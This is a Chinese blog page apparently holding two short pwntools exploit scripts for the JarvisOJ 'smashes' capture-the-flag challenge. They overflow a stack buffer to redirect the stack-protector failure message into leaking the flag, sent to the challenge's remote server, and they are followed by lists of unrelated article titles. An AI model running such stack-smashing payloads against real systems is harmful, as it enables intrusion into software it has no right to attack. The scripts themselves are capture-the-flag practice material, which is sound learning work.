栈溢出之利用-stack-chk-fail

from pwn import *

old_flag_addr = 0x600d20

new_flag_addr = 0x400d20

#p = process('./smashes')

p = remote('pwn.jarvisoj.com', 9877)

p.recvuntil("name?")

payload = "a"*0x218 + p64(new_flag_addr)

payload += p64(0) + p64(old_flag_addr)

p.sendline(payload)

p.recvuntil("flag: ")

env = "LIBC_FATAL_STDERR_=1"

p.sendline(env)

flag = p.recv()

print flag

论canary的几种玩法

from pwn import *

context.log_level = 'debug'

cn = remote('pwn.jarvisoj.com', 9877)

# cn = process('smashes')

cn.recv()

cn.sendline(p64(0x0400d20)*300)

cn.recv()

cn.sendline()

cn.recv()

  

最新文章

  1. java多线程与单例模式(Singleton)不得不说的故事
  2. MySQL中distinct和group by性能比较[转]
  3. JavaScript:最烂与最火
  4. 深入理解C++中的mutable关键字
  5. ☀【动画】过渡 transition
  6. javaScrip中的“?”
  7. 转载: js jquery 获取当前页面的url,获取frameset中指定的页面的url(有修改)
  8. Roman numerals
  9. C#中XmlSerializer的内存占用问题
  10. SQL复习六(视图)
  11. address2line 定位 Android c++奔溃位置
  12. spring boot 中active的profile会和标准配置合并吗
  13. windows系统中给qt工程添加第三方库
  14. Python爬虫之12306-分析请求总概述
  15. vue搭建app, M端项目流程
  16. python2 with open(path,"",) as f:
  17. 网页性能工具:webpage使用
  18. 51 Nod 1256 乘法逆元(数论:拓展欧几里得)
  19. java并发编程实战:第五章----基础构建模块
  20. scoket常用函数简单介绍

热门文章

  1. win10+PHP 安装memcache
  2. Linux下更改mysql版本
  3. php随机生成验证图片
  4. word2vec改进之Negative Sampling
  5. Vue.js实战
  6. sql注入教学
  7. jieba gensim 最好别分家之最简单的相似度实现
  8. 洛谷P2047||bzoj1491 [NOI2007]社交网络
  9. 087 Scramble String 扰乱字符串
  10. 如何理解linux多用户多任务